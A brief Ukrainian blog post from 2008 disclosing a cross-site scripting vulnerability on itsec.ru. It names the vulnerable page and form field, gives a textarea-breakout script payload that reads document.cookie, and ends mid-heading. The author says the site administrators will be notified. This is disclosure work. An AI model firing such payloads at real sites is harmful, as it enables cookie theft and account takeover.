Уразливість на www.itsec.ru
23:59 28.11.2008У січні, 27.01.2008, я знайшов Cross-Site Scripting уразливість на cекюріті сайті http://www.itsec.ru. Про що найближчим часом сповіщу адміністрацію сайта.
XSS:
POST запит на сторінці http://www.itsec.ru/pr-send.php
</textarea><script>alert(document.cookie)</script>
В полі: Текст пресс-релиза.
XSS через GET: